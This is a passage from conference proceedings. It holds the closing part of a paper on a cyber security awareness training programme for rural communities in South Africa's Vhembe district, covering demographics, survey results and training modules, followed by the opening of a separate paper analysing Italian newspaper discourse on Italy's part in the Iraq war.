performed by residents if the country explicitly authorised these acts on its behalf. The country may also
be held responsible for a breach of an international obligation, or for not preventing an attack from taking
place (Kulesza, 2010). Developments in global technology make it difficult for a country to control its
residents’ actions in operating hardware located within the country’s territory, and nearly impossible to
control non-residents outside a country’s jurisdiction that controls hardware inside the country’s
jurisdiction. Regardless of the associated difficulties, cyber crime is a reality that unfortunately often
targets the uneducated individuals that do not know how to identify cyber scams or how to keep their
computers protected.
Therefore, South Africa can be considered responsible for preventing attacks from inside its borders to
other countries. It is accordingly the responsibility of the South African Government to support extensive
awareness programs to prevent attacks from inside South Africa’s borders on other countries. In its quest
to manage Cyber Security, a formal notice was issued in February 2010 regarding its intention of
publishing a South African National Cyber Security Policy (Gazette No 32963, Feb 19, 2010). The
country did this within the context of its global citizenry and the commitment it has made to the World
Summit on Information Society (WSIS) in 2001, and to the International Telecommunication Union (ITU)
to assist in further development of the Global Cyber Security Agenda (GCA). One of the elements of this
policy is the importance of cyber security awareness programs for South Africa.
3. Situational analysis – the case of the Vhembe district
The CSIR and the University of Venda's schools of Mathematical and Natural Sciences, and
Management Sciences are collaborating to raise cyber security awareness in local rural communities in
the South African Limpopo province, Vhembe district. In Phase 1, a group of CSIR researchers trained a
number of student volunteers at the University of Venda to teach specific groups of computer users,
including secondary school users, further education training users, university (non-technical) users and
community centre users. More rural communities are becoming integrated into the global village due to
increased hardware and software corporate donations, the proliferation of mobile Internet devices and
government programmes aimed at bridging the digital divide. The next section will provide some
information on the area.
3.1 Limpopo Province
The Limpopo Province comprises four districts: Vhembe, Capricorn, Greater Sekhukhune Waterberg and
Mopani. In 2001, 33% of the population aged 20 years or older in Limpopo had no education at all, while
7% had post-high-school education (see Table 1). These figures, in general, show an increase in all
categories since 1996 with the exception of the no schooling category. This decrease indicates a higher
percentage of people attending school.
Table 1: Level of education among adults 20 years or older, in Limpopo, 2001
Number %
No schooling 789731 33
Some primary education 336377 14
Completed primary education 133206 6
Some secondary education 629057 26
Grade 12/Standard 10 337627 14
Higher education 162454 7
Total 2388452 100
In Limpopo there are approximately 4290 primary schools and 1300 secondary schools with over 1.8
million learners and almost 58000 teachers (2002). In 2002 less than 10% of the schools in the province
were computerised and fewer than half of those were really utilising their computers. Since then the
115

Marthie Grobler et al.
situation has improved, mainly due to a considerable amount of donations, but many schools still lack
computers, connections and capabilities related to them.
In higher education institutions in Limpopo, there are about 40000 students enrolled per year. The
number of university graduates is about 15000 per year, with only 4% graduating in ICT related fields.
The Limpopo province had an enrolment figure of 10500 for 2010.
3.2 Vhembe District
The Vhembe District covers 21407 square km of land. It was originally settled by tribes of Khoisan
people. It was later settled by the Venda people (recently migrated from what is now Matabeleland South
in Zimbabwe), who constitute a majority of the Vhembe population today. According to the DWAF Stats
Form-D study, the Vhembe population has increased and is now standing at 1.388427 million people.
The number of households is estimated at 269547, with 50% of the population being under the age of 20
years. The District is still faced with infrastructural backlog, with 53% of the population not having access
to running water, 68% of the population not having access to sanitation, and 46% of the population not
having access to basic levels of electricity (Vhembe District Municipality, 2007). As a result, much of the
population would use centralised community centres or internet cafes to access the internet.
About 57% of the population does not have formal education, 9% has primary education, 20% has
secondary education and only 3% has tertiary education. The main contributions to the economy are
community services (22%), trade (14%) and mining (0.7%). Tourism, agriculture and manufacturing are
also significant with potential to be further enhanced. The unemployment level is at 53% (Vhembe District
Municipality, 2007). Tables 2 to 5, and Figure 1 show a range of demographic related statistics on the
population of the Vhembe District.
Table 2: Local municipalities (Vhembe District Municipality, 2007)
Local municipality Population %
Thulamela 584 568 48.72%
Makhado 497 093 41.43%
Mutale 78 917 6.58%
Musina 39 308 3.28%
Table 3: Language and population demographics (Vhembe District Municipality, 2007)
Language Population %
Venda 818 900 68.25%
Tsonga 316 703 26.40%
Northern Sotho 27 922 2.33%
Afrikaans 13 697 1.14%
Sotho 7 714 0.64%
Other 5 942 0.50%
English 4 545 0.38%
Ndebele 1 763 0.15%
Zulu 870 0.07%
Tswana 840 0.07%
Xhosa 659 0.05%
Swati 331 0.03%
Table 4: Gender composition (Vhembe District Municipality, 2007)
Gender Population %
Female 662 815 55.24%
Male 537 041 44.76%
116

Marthie Grobler et al.
Table 5: Ethnic groups (Vhembe District Municipality, 2007)
Ethnic group Population %
Black African 1 181 672 98.48%
White 13 625 1.14%
Indian/Asian 2 911 0.24%
Coloured 1 648 0.14%
Figure 1: Age analysis (Vhembe District Municipality, 2007)
These new netizens in rural communities are not cyber security savvy. This is why cyber security selfdefence
workshops for volunteer facilitators in the Vhembe district were introduced. Discussions for the
initiative started at the end of 2009 but the formal planning, collaboration and the development of the
cyber security awareness training programme officially commenced in May 2010.
4. Current level of awareness in the Vhembe district
The proposed cyber security awareness training module is part of a larger project that aims to establish
an Institute for Broadband and Rural ICT Development at the University of Venda to assist rural
communities in adapting to the opportunities presented by broadband and other forms of ICT. As part of
the project, the CSIR developed surveys to assess the current level of cyber security awareness within
the communities. Large numbers of these surveys were distributed to some of the community centres
and schools participating in the project.
During the second part of 2010, a number of surveys were distributed to both educators and secondary
school learners in the Vhembe District. These surveys were presented to participants before any cyber
security awareness training material was presented to them, intended to test current awareness of cyber
related topics. The surveys were presented in English, which is not the mother tongue for most of the
participants. The results presented next accordingly need to take potentially language barriers into
consideration.
4.1 Educators’ survey
One of the initial pilot studies was done with educators attending a community centre focused on the
development of Mathematics and Science of learners in rural communities. Participants in the survey
indicated that they do not have a problem with English as spoken language, but they are not comfortable
with English as a written language. These results were confirmed with contradicting answers given in the
surveys. Participants were mostly over the age of 30 and thus did not grow up in the technological era for
these rural communities. More than 90% of the participants have cell phones, but they indicated that this
is used mostly for text messaging and verbal communication.
Although 67% of the participants have access to a computer (either at home or at work), the participants
indicated that they do not make use of computer-based instant messaging. Participants with access to
computers do make use of the internet for informational purposes. Participants indicated that the use of
the internet for e-commerce was limited and that they prefer not to make use, for example, of the South
African online system for income tax completion (e-filing). Most of the participants correctly indicated the
117

Marthie Grobler et al.
meaning of social networking, whilst only 44% knew what the terms phishing and viruses meant.
Participants did not know what a strong password is but did indicate that they will not reveal their
passwords to one another. Participants indicated that they would advise their children to meet online
friends in places other than chatting rooms. This can potentially place the children in danger of meeting
sexual predators in a real world scenario. A further concern is that 44% of the participants were prepared
to submit their personal details to a popular website, with no regard of the security implications and
potential for identity theft. Although the sample group did not constitute a large percentage of the
educator group in the Vhembe District, the results clearly indicate that the current cyber security
awareness level is relatively low, and there is a dire need for urgent awareness training. This pilot study
therefore serves as additional motivation to continue the research and roll out the awareness training on
a larger scale within the Vhembe District.
4.2 Secondary schools’ survey
Surveys were distributed at two secondary schools in the Vhembe District. At School A, 69% of
participants indicated that they were comfortable with English as a written language, whilst 15% indicated
that they were only comfortable with English as a spoken language. At School B, 26% of participants
indicated that they were comfortable with English as a written language, whilst 84% indicated that they
were only comfortable with English as a spoken language. At both schools, majority of participants
indicated that they only have access to cell phones as technology devices. At both schools, only 7% of
participants have had prior access to a desktop computer. Participants with access to computers or cell
phones connected to the internet use it for entertainment and gaming.
At both schools, most of the participants correctly indicated the meaning of phishing and social
networking. Although not all participants have regular access to social networking sites or online chatting,
they are aware of some of the inherent dangers of communicating over the internet. Most participants
indicated that they would not arrange an actual meeting with someone that they have met online. 99% of
all participants have indicated that they will not submit personal information on a website, even if that
website is very popular. At School A, 69% of participants indicated that it is wrong to break into someone
else’s email account and send emails pretending to be the other person. 23% of participants indicated
that they would like to learn how to break into someone else’s email account. At School B, only 24% of
participants indicated that it is wrong to break into someone else’s email account and send emails
pretending to be the other person, whilst 100% of participants indicated that they would like to learn how
to do this. Most participants correctly identified weak passwords. Typical to the general classification of
Millennials or Generation Y (individuals born between 1982 and 2000), the participants show increased
tendencies towards ambition, new challenges and inquisitiveness (Kane, 2010). The participants have
created a long list of topics that they would like to see addressed in future cyber security awareness
training programs.
4.3 Development of training material
The proposed cyber security awareness program focuses on educating beginner internet and technology
users in basic computer security, and safe and secure online habits. The objective of this program is to
prepare civilians for use of broadband applications and new applications for cyberspace. It aims to
increase awareness and understanding of the dangers of the internet, whilst providing individuals with the
necessary knowledge to make the right decisions in internet-related situations. This program is not a
computer literacy course, but can be better defined as a self-defence course for internet users. The target
audience is computer users with working computer literacy and awareness and prior exposure to the
internet. These individuals should not have any formal computer related training, with the exception of
computer literacy courses. For the time being, four user groups are identified:
Secondary school pupils,
Further education training (FET) college students,
University students not studying towards a technical or information technology degree, and
Community members using the computer facilities of community centres.
The program is rolled-out in the Vhembe District, Thohoyandou in the Limpopo province of South Africa.
Within the province, entities had to be selected to partake in this program. Two classifications are used
for entity selection, as shown in Table 6.
118

Table 6: Classification regarding entity selection
Marthie Grobler et al.
Less resourced entity More resourced entity
Internet connection 1 modem > 1 modem or ADSL
Number of computers < 5 5 or more
Number of users/computers 100:1 99:1 <
Level of maintenance (functionality) Less than 50% working More than 50% working
For the initial training program, only schools and centres that have previous exposure to computer
facilities and internet access are selected as participants in the setup.
The cyber security awareness program modules are divided into four main topics:
Physical security – This training session addresses the importance of securing the physical computer
in order to protect the computer user from potential cyber security dangers. This session addresses
the physical protection of computers, laptops and mobile phones, as well as the importance of
password protection.
Malware and malware countermeasures – This training session touches on some of the different
types of malware that can be encountered in cyberspace, and provide guidelines on how to protect a
computer or mobile phone from these malware types.
Safe surfing – This session addresses the guidelines that internet users should practice to ensure
that the time they spend online are productive and secure. This session addresses internet surfing,
email security, file sharing, copyright, downloads and storing in more detail.
Social aspects of cyber security – This session addresses the safest way to use social networking, as
well as the dangers that are associated with social media on the internet and cyberspace. This
session also introduces social engineering, identity theft, cookies and cyberbullies.
5. Feedback from student trainers
In September 2010, researchers from the CSIR have trained a number of volunteers from the University
of Venda to train the community. The majority of these students are second and third year computer
science students from the University of Venda. These students assisted with the distributions and
collection of initial surveys to the participating entities to determine the current level of cyber security
awareness. After completing the training, the student trainers completed questionnaires about their
experience. Figures 2 to 5 show the student trainers' feedback on the content of the training modules.
Since the number of trainers needed for the pilot project was relatively small, the responses to the
questionnaire are not indicative of the awareness level of the intended target audiences, but rather an
indication towards the usability of the training modules.
From Figures 2 to 5, it is clear to the student trainers found the training modules very useful and
informative. Where necessary (e.g. community centre, topic cookies), the material were adjusted
according to the feedback received from the student trainers.
Number of responses
4
3
2
1
0
Physical
computer
security
Physical
mobile
security
Password
protection
Virus
protection
Secondary school feedback on content
Pop-ups,
adware and
spyware
Botnets
Surfing
the
web
Topics
Email
security
File
sharing
and
copyright
Not interesting Did not learn anything new Learned some new things Learned a lot of new things Too technical
Figure 2: Feedback on the content of the secondary school training module
119
Social
networking
Social
engineering
Identity theft
Cookies
Cyberbullies

Number of responses
5
4
3
2
1
0
Physical
computer
security
Physical
mobile
security
Password
protection
Virus
protection
Marthie Grobler et al.
Further education training feedback on content
Pop-ups,
adware and
spyware
Botnets
Surfing the
web
Email
security
Topics
File sharing
and
copyright
Not interesting Did not learn anything new Learned some new things Learned a lot of new things Too technical
Figure 3: Feedback on the content of the FET training module
Number of responses
4
3
2
1
0
Physical
computer
security
Physical
mobile
security
Password
protection
Virus
protection
Pop-ups,
adware and
spyware
Internet
banking
University (non-IT) feedback on content
Botnets
Surfing the
web
Email
security
Topics
File sharing
and
copyright
Not interesting Did not learn anything new Learned some new things Learned a lot of new things Too technical
Figure 4: Feedback on the content of the university training module
Number of responses
6
5
4
3
2
1
0
Physical
computer
security
Physical
mobile
security
Password
protection
Virus
protection
Pop-ups,
adware and
spyware
Internet
banking
Community centre feedback on content
Botnets
Surfing the
web
Email
security
Topics
File sharing
and
copyright
Not interesting Did not learn anything new Learned some new things Learned a lot of new things Too technical
Figure 5: Feedback on the content of the community centre training module
6. The way forward
The next step in the cyber security awareness program is to roll the training material out to the
community. Each of the students that were trained is allocated to a specific entity. These students have
to train the community in their specific entity. The community training program is free of charge, but the
volunteers need to adhere to specific conditions in order to participate in the program:
120
Internet
banking
Social
networking
Social
networking
Social
networking
Social
engineering
Social
engineering
Social
engineering
Identity theft
Identity theft
Identity theft
Cookies
Cookies
Cookies
Cyberbullies
Cyberbullies
Cyberbullies

Marthie Grobler et al.
The volunteer needs to complete a questionnaire before starting the training. This questionnaire will
not be anonymous and will allow the CSIR to score the individual's current level of cyber security
awareness.
The volunteer needs to be willing to attend classes organised and hosted by the student volunteer
trainers from the University of Venda. The trainers will communicate the dates and times of these
training with the volunteers. To be a part of this training, the volunteer needs to attend all the classes
and workshops.
The volunteer needs to complete a questionnaire after completing the training. This questionnaire will
not be anonymous and will allow the CSIR to score the individual's awareness after completing the
program.
The questionnaires consist of three sections. Basic demographic information is asked in order to
customize the cyber security awareness training program to fit a specific user group and in order to
identify an individual's level of awareness. History and background – Technology questions are asked in
order to determine the current level of technology usage within the specific user's environment. Specific
scenarios are asked to determine the current level of cyber security awareness and understanding within
the specific user's environment.
7. Conclusion
The results from the pilot surveys hint toward a low level of awareness regarding the implications and
dangers of cyber warfare and the consequences of participation in social networks. Although the current
research is based on an exploratory study with a small group of participants, the research uncovered a
need for intensive further training in a number of identified modules, including secondary schools, further
education training colleges and community centres, as well as all university staff and students. The main
benefit of a large scale roll out of this cyber security awareness training programme is that empowered
trainees should be able to identify the dangers of providing information and/or enrolling on social
networks where they and their personal information can be exposed and the information could be
abused. Further awareness training targeted at the different stakeholder groupings should ensure that
capacity is build and that the Vhembe District will become one of the first districts in South Africa with a
full understanding and appreciation of cyber security and social networking dangers. Further research
and additional work toward this project should drastically improve the level of cyber security awareness in
South Africa.
References
AFP. (2010). Mozambique unrest shows power of the SMS. Available from: http://www.mg.co.za/article/ 2010-09-07mozambique-unrest-shows-power-of-the-sms
(Accessed 15 October 2010).
Jansen van Vuuren JC, Phahlamohlaka. J, & Brazzoli M. (2010). The impact of the increase in broadband access on
National Security and the average citizen. Journal of Information Warfare. Vol 9(3). Dec 2010
Kane, S. (2010). Generation Y. Available from: http://legalcareers.about.com/od/practicetips/a/ GenerationY.htm
(Accessed 7 January 2011).
Kebbs, B. (2009). PCs used in Korean DDoS attacks may self destruct. Available from:
http://voices.washingtonpost.com/securityfix/2009/07/pcs_used_in_korean_ddos_attack.html (Accessed 4
September 2009).
Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. Paper presented at the 5 th GigaNet Symposium.
Available from: http://api.ning.com/files/6Uhv8JceS2kZGH4RRbdEOAwdiHrryXnRiwQO
v1MGYU6hEcBG9M4F5irLoK8B56a8hO*0kQ*CbTExGBpq8wjcPQZzChrSUrXV/KULESKA.pdf (Accessed 17
November 2010).
Phahlamohlaka, J. (2008). Globalisation and national security issues for the state: Implications for national ICT
policies. Social Dimensions Of Information And Communication Technology Policy. Vol. 282/2008 Springer
Boston pp. 95-107.
Stiennon, R. (2009). SA could face cyber war. Available from: http://ww2.itweb.co.za/sections/
internet/2009/0905291159.asp?A=COV&S=Cover&T=Section&O=C (Accessed 29 May 2009).
Vhembe District Municipality. (2007). Quality in Service. Available from: http://www.vhembe.gov.za/docs/
Approved%20IDP%20final%20version%201%202007-8%20-2011-12.pdf (Accessed 2 February 2011).
Wikipedia. (2010). Vhembe District Municipality. Available from: http://en.wikipedia.org/wiki/ Vhembe_
District_Municipality (Accessed 2 February 2011).
121

Missionaries of Peace – The Creation of the Italian Identity in
the Representation of the Political Discussion in Favour of
Italy’s Participation in the Iraq War in Il Corriere della Sera
Marja Härmänmaa
University of Helsinki, Finland
marja.harmanmaa@helsinki.fi
Abstract: Linguistics is not a traditional method used in the security studies. However, today’s world, and the
information society are ever more based on texts and images. Also, both the sense of security and a threat are
produced with language at the first place. For this reason, the study of a discourse used in a conflict is of vital
importance. The present paper will deal with the political debate in favour of Italy’s participation in the Iraq war in the
spring of 2003, as it is represented in one of Italy’s most important newspapers, Il Corriere della Sera. In using the
term ‘representation’ I mean the interpretation of a given phenomenon with language. According to the method of
critical linguistics elaborated by Roger Fowler, Robert Hodge and Gunther Kress, and based on the functional
grammar of M.A.K. Halliday, I shall analyse the vocabulary and naming of different elements related to warfare, and
transitivity; I will examine the choice of agents and affected participants and types of predicates to which they are
related, as well as the argumentation strategies. In conclusion, I shall show how the representation of the Iraq war
contributes to the creation of and/or emphasis on a specific national Italian identity.
Keywords: Italy’s national identity; Iraq war; discourse analyses; political discourse; media discourse; right-wing
coalition
The war in Iraq officially began on March 19, 2003, when the United States started to bombard the
country. The following day the US troops crossed the Southern border of Iraq from Kuwait and entered
the country. Before the invasion, Washington had asked for Italy’s willingness to offer first logistical and
later direct military help if the war should start (Sarzanini, 10.4.2003). Public opinion and the leftist parties
of the political opposition in government in Italy had been very much against any kind of Italian
involvement, and demonstrations and strikes against the war started before the US invasion and
continued after. Although the right-wing government initially denied any possible Italian involvement in the
warfare when it began, the leading politicians slowly started to change their opinions. At the end of
March, Italy gave permission to the US to send American parachutists from Italy to Iraq. Around April 10
the Italian Prime minister, Silvio Berlusconi, started to talk in public about the possibility of an offer of
concrete military aid to the US (Di Caro, 11.4.2003). A few days later (April 15) first the Senate and then
the parliament voted in favour of sending approximately 3000 Italian soldiers to Iraq in May: in the
parliament the decision was approved by 308 deputies, 31 voted against and 159 abstained. In the
Senate the decision was approved with 153 votes, 26 voted against and 2 abstained.
(Caprara,16.4.2003) Soon after President Bush had proclaimed on May 1, 2003 that the war was ended,
Italian troops left for Iraq, where they stayed until December 2, 2006.
This paper focuses on the representation of the Iraq war by the Italian ruling politicians as they argued in
favour of Italy’s participation and as it was reported in an Italian newspaper. By representation I mean the
interpretation given of a phenomenon with language. I am mainly using the method of critical linguistics
as it was developed at the first place by Roger Fowler, Robert Hodge and Gunther Kress. Based on the
systemic-functional grammar of M.A.K. Halliday, critical linguistics is one method of critical discourse
analyses. In this kind of representational analysis especially crucial features are the naming and
transitivity. (Fowler, Hodge, Cress and Trew 1979; Fairclough 1995; Hodge and Cress 1996; Lehtonen
2000, 44-48).
Representation is always created from a specific ideological point of view. According to critical linguistic
theory, any aspect of linguistic structure, whether phonological, syntactic, lexical, semantic, pragmatic or
textual, can carry ideological significance; in other words, ideology differs systematically in different forms
of expression, in different choices of words and grammatical phrasing. (Fowler 1991, 36, 66, 67) As
sociologists nowadays agree, newspapers or media, instead of reflecting reality, rather produce it from a
certain ideological point of view. The news is one product among others. Its publication is the result of a
complex selection that reflects the ideology of the newspaper and the society to which it is addressed:
these factors not only give relevance to a phenomenon reported as news, but also indicate how it is
reported. (Fowler 1991; Fairclough 1995)
122

Marja Härmänmaa
This research is based on articles published between March 19 and May 1, 2003 in the most sold and
read Italian newspaper, namely Il Corriere della Sera. The paper was founded in Milan on March 5,1876,
and many prominent Italian intellectuals and writers have collaborated with it. Nowadays the newspaper
belongs to RCS MediaGroup, the first Italian publisher that has developed a strong international presence
in the sector of daily newspapers, and even has interests in the Spanish market, through the company
Unedisa that publishes the daily El Mundo. Over a half of the shares of RCS Media Group is owned by
large enterprises (FIAT holds about 10%) and banks: Mediobanca S.p.A., Italy’s leading banking group,
is the main shareholder with over 13% of the shares. From a political point of view, Il Corriere della Sera
is independent, but it is situated in the centre-right. It is distributed all over the world and it has daily
edited, free Internet sites. 1
For the present research, I have studied the articles in Il Corriere della Sera’s Internet archives, 2 where it
seems to have stored all the past numbers from 1991 onward; only the photographic material is lacking.
The articles conserved in the Internet archive are merely news, whilst there are fewer comments or
editorials. The central feature of the news about the political decision-making is the abundance of direct
quotations from politicians’ speeches or their words, in most cases indicated by quotation marks. The
quotations in the press have two basic functions: on the one hand, they are used to emphasise certain
words or expressions, and on the other, to mark a citation. The meaning of a citation is to make the text
more “objective”, to create an illusion that things speak for themselves. (Tuomarla 2000: 163) For this
reason the direct, explicit voice of the newspaper on some occasions seems to be lacking, and what I am
merely studying is the language that the politicians have used and that has subsequently been reported
in the articles. Of course the “objectivity” is only an illusion, since the author subjectively chooses what to
put in the text, which words or statements to report, even as direct quotations. Plus, in many cases the
language used by the politicians coincides with the language of the newspaper: the terms, expressions or
statements that on some occasions might be between quotation marks, on the others are used directly by
the journalist. However, with this tactical choice of using citations the author is able to avoid making
statements of his/her own, and instead puts him-/herself in the background in the role of a mere objective
observer.
Also the decisions the author considers to have “news value”, and thus report as news, are made
subjectively. By archiving the articles about the political decision making, Il Corriere della Sera initially
shows its normal interest in domestic politics, and secondly, it assumes the role of mediator: the paper
informs the public about the point of view of the Italian politicians, by reporting what they have said about
the matter. The articles in the Internet could thus be considered as a sort of archive of historical
documents (instead of news articles only), with which one could reconstruct the chronology of the
decision-making that led to Italy’s participation in the war.
The image of the war that emerges from these particular articles is extremely abstract and sterile.
Whereas the main protagonists are the Italian politicians or Italy as a country, there are no real warriors.
During the whole period, the aggressors in Iraq, George Bush or Saddam Hussein, the original reason for
the war, and the Iraqi people are hardly mentioned at all. The tragic events that on the frontline led to the
destruction of the Iraqi army, as well as the brutal attacks against civilians by the US forces that all
caused thousands of casualties within the first few weeks of the war are mentioned very little, if at all.
The war that is discussed by the politicians is truly a paper war without weapons or victims, or reason: it
is a war fought among the politicians about the meaning of the terms having as a final aim the shipment
of Italian troops to Iraq with valid justification.
One linguistic strategy that renders the representation of the war ever more abstract is the abundance of
mental and verbal actions, whilst there are very few physical ones. As normally in political language, here
too people are “saying”, “considering” or “deciding”, instead of “attacking”, “shooting”, or “bombarding”,
which would be rather normal terms in an article about a war. Also the metaphorical representation of
processes as entities with the nominalization of the verbs contributes to the idea that it is more a question
about an intangible dilemma instead of a concrete course of action and a human catastrophe. For
instance, when the newspaper writes about “sending of the Italian troops on an operation of
peacekeeping in Iraq” (Verderami, 15.4.2003), not only the verb and the agent are missing, but also the
true nature of the action fades away in a vague noun: “the operation of peacekeeping”.
1 See the information delivered by RCS Mediagroup on their Internet home page
http://www.rcsmediagroup.it/wps/portal/mg/home/?language=it
2 http://archiviostorico.corriere.it/
123

Marja Härmänmaa
In most cases the event itself is explicitly called “war” (la guerra), however, usually there is no
specification where or against whom the war is conducted. In some cases it is mentioned that the war is
in Iraq (la guerra in Iraq). Only in one case is it specified, that the war is actually fought “against” Iraq
(l’imminente guerra all’Iraq). There are also numerous synonyms and quasi-synonyms, as usually, when
the topic is of a particular preoccupation or problem. (Fowler 1991, 85). On many occasions, to soften the
significance of ‘war’ the journalists have used alternative words, such as ‘conflict’ (un conflitto), ‘military
intervention’ (l’intervento militare), ‘direct intervention’ (l’intervento diretto), ‘offensive actions’ (azioni
offensive). Only in few cases are the “real responsible” for these “actions” mentioned, and the operation
is called ‘US intervention’ (l’intervento Usa) or ‘the angloamerican attack’ (l’attacco angloamericano),
even though, here as well the process is nominalised and the agent disappears in the adjective.
Negotiating the political line of a country can be considered as a negotiation of the country’s identity. By
creating or emphasising a certain identity politicians are able to justify a certain role in the field of
international politics. 3 In this case the Italian government at any price wanted the country to have an
active role and participate in the war – regardless of the fact that public opinion was against it. To sustain
their point of view, the politicians have to know which positions the public will accept, which positions
must be defended, and how these positions should be defended. In other words, the politicians have to
be aware of the Italians’ innate “identity”: which are their interests, values and beliefs. (Lo Cascio 1991;
Perelman 1996) This will have an effect on the strategies of argumentation, the authorities to whom
apply, and the terminology. Vocabulary is of great interest, for it can be regarded as a representation of
the world for a certain culture; or as the world is perceived according to the ideological needs of a culture.
(Fowler 1991, 82)
Before the parliament was to take the decision about Italy’s military participation in the war on April 15,
the authorities to whom the newspaper appeals are the US and Great Britain: the Prime minister
Berlusconi will send military troops to Iraq as the US and Great Britain have asked, and as the Italian
Prime minister Silvio Berlusconi had promised in a phone call to President Bush before the war started.
(Sarzanini, 10.4.2003; Di Caro, 11.4.2003; Verderami, 15.4.2003) With such an argumentation, the rightwing
government not only openly showed its pro-American policy, but also Italy is represented as a
reliable country that cannot, and will not rescind a promise it has given – although it is questionable,
whether Prime minister Berlusconi had the right to make such a promise on his own. In addition, Italy’s
presence in Iraq among the first foreign countries becomes a sign of its political prestige on the
international level. There is the urge to hasten, as Poland is already in Iraq, whilst Spain, Denmark,
Holland and Portugal are about to go there too. (Verderami, 15.4.2003) The craving to gain political
importance with the participation in the war is also evident in the titles of the articles, such as “The phase
of emergency starts and our country will participate among the first ones” (Sarzanini, 10.4.2003), or “We
and the USA will sow democracy” (Di Caro, 17.4.2003) that gives the idea of a close collaboration
between the US and Italy in the administration of Iraq. In “Within six months a command to Italy” (Nese,
4.5.2003) the title is almost misleading, as the topic of the article concerns the quality and quantity of the
troops that will be sent to Iraq, whilst a hypotheses about the organisation of the administration of the
foreign soldiers is mentioned only briefly.
Nevertheless, Italy is not only a Catholic country among others, but it is the very centre of Catholicism.
The strong presence of the Catholic Church has an influence on social life and civilian values.
Furthermore, Italy was one of the aggressors in the Second World War, the memory of which and a sort
of shame still persists among the adult population of the country. Therefore, any argumentation on behalf
of sending soldiers to an occupied country to help the aggressor, against international law and without
the consent of the UN, based on any kind of utility, would simply be unacceptable to the great majority of
the people. Instead, the main reasons why Italy should participate in the war, are humanitarian.
Halliday has used the term ‘anti-language’ for the cases in which the words change their meaning.
(Halliday 1976) In the discourse of the right-wing politicians, helping the invader to control a foreign
country is transformed into ‘peace-keeping’. The activity of the Italians in Iraq will concern peace, which,
on the other hand, shows the capacity of the politicians to foresee the future, since during the publication
of these articles the war was still going on: the Italian “soldiers [go] to Iraq for peace”, there will be sent
“an Italian body of peace” that is “ready to participate in peace-keeping”. The Italian one is “a mission that
will guarantee peace in Iraq”. Alternatively, the reasons are related to charity. The Italians will “do this
3 Researchers from different disciplines have different definitions of terms like ’identity’, ’role’, ’self’, ’subject’, and so on. Here I
agree with Ivanič, according to whom the term ‘role’ “refers to the public, institutionally defined aspect of identity”, whilst ‘identity’ is
a more private aspect (Ivanič 1998, 10).
124

Marja Härmänmaa
task to defend the population”. The approximately 3000 soldiers will be sent to Iraq for “humanitarian
purpose”, to “guarantee the aid”, to “bring humanitarian help to tormented Iraq” (Fregonara, 14.4.2003)
and “in order to alleviate the sufferings of the Iraqi people”. (Franchi, 16.4.2003) The government has
created a “humanitarian machine” (Sarzanini 10.4.2003), that will effectuate “a humanitarian intervention”
(Verderami, 13.4.2003), and contribute to “the humanitarian stabilization in Iraq”. (Fregonara, 14.4.2003)
In addition to the topics of medicine, sanitation, reconstruction of the streets, bridges and buildings, a
peculiar national characteristic of the Italian discourse about the war is the argumentation on behalf of the
salvation of Iraqi cultural heritage. It is mentioned in different articles that the Italians will work to rescue
the historical monuments and works of art. (Nese, 18.4.2003; Caprara, 20.4.2003) Yet in one article it is
presented as one of the main reasons to go to Iraq, as the title explicitly states: “On the front line for
cultural heritage”. (Conti, 4.5.2003)
In all these articles Iraq is represented, when it is represented, as a country that is in a state of extreme
confusion, and therefore eagerly needs the Italians to rescue it and to react “to the nightmare of
emergency” created in Iraq (Breda, 15.4.2003). Since no reason is given for this confusion, the result is
that the disorder was born out of nothing, as a natural catastrophe. Plus, it seems to have nothing to do
with the ongoing warfare, since the only concrete attributions about the nature of the disaster are related
to criminality: it is “a country at the mercy of corruption, of speculation, of black market, of robbery and of
spreading criminality”, a “disastrous country” (Nese, 5.5.2003), a country of “plundering and banditry”.
(Caprara, 20.4.2003) The Iraqi people are mentioned only once as a passive group with no will of their
own nor capacity to react in any way to the “criminality” that somehow and suddenly “has spread” in their
home country, and for this reason: “the Iraqi people cannot be left alone”, whereas from Italy’s part, “it
would only be vile not to stop the agony of Iraq”. (Verderami, 13.4.2003)
The most current term used to describe the nevertheless obscure activity of the Italians in Iraq, the true
slogan of this cruel and disastrous adventure, is ‘mission’ (la missione). This term, in Italian, has many
connotations and can be used in military, political, civic or religious meaning. In any case, it always
contains the idea of devotion, moral obligation or duty towards the army, the State, the society or the
Church that has given the commission. (Lo Zingarelli 2003) It is repeatedly mentioned in articles that the
Italians have a mission in Iraq. (Breda, 15.4.2003) It is: “a humanitarian mission of the Italian
government”; a mission “that will guarantee peace”; a mission for the freedom of the country: “the mission
Iraqi freedom”. (Verderami, 15.4.2003)
Thus, in these articles, willingly or not, like the Iraqi people, also the Italians are transformed into a group
of unconscious people, unable to take the decision of how to act and react in the face of war. Going to
Iraq is represented as an obligation or a duty that they simply cannot decline -- even though, it is not
pointed out, who creates this obligation, nor what kind of sacrifices the filling of this duty actually will
require, neither in what the duty will actually entail. Nevertheless, “Italy, therefore, will do her duty” as the
Italians “cannot and [they] must not stay unarmed in front of the situation of Iraq after the war”. And, since
the Italians were “fully aware of [their] role” (Verderami, 13.4.2003), they went to Iraq, and stayed there
over two years.
Conclusion: “The humanitarian mission[s] of the Italian government[s]”
There is an Italian proverb according to which “Il lupo cambia il pelo ma non il vizio” that literally
translated in English would be: “The wolf changes the hair but not the vice.” The notion of “the Italians’
mission in the world” was peculiar already to Giuseppe Mazzini (1805-1872), a great 19 th -century
politician, a leading figure of liberal nationalism, as well as of Il Risorgimento, the unification of Italy.
Mazzini’s political rhetoric is full of religious terms that reflect his religious concept of Nation, Fatherland
and politics in general. According to Mazzini, the Italians’ had a special “mission that [no more no less]
God had given”, a “duty towards humanity”, “to fight wherever for the liberty of the people”. Mazzini
justified his ideas with the concept of the Italians as heirs of all the values Rome represented and with
the significance of the city of Rome in Western history and. According to him, Rome had been twice
“metropolis”, “the Temple” of Europe, as it had worked for the unification of the continent, first during the
Roman Empire and after when it became the centre of the Christianity. (Mazzini 1860.)
The glorification of Roman history, placing the eternal city as a model for arts and for social life, and the
idea of the Italians as its successors is a constant feature in the history of Italy. It manifested itself
particularly in the Renaissance, and in the twentieth century, when Fascism adopted the cult of Rome,
125

Marja Härmänmaa
romanità, to serve its ever more aggressive political goals. (Visser 1992) Though the tradition of classical
culture persists even today in Italy as elsewhere in the Western world, according to an Italian historian,
Antonio La Penna, the disastrous Second World War and the end of Fascism anyway made the Italians
renounce the idea of being the privileged heirs of ancient Rome. (La Penna 1973, 1326)
The Italian government that took the decision to send troops to Iraq was composed of a coalition of rightwing
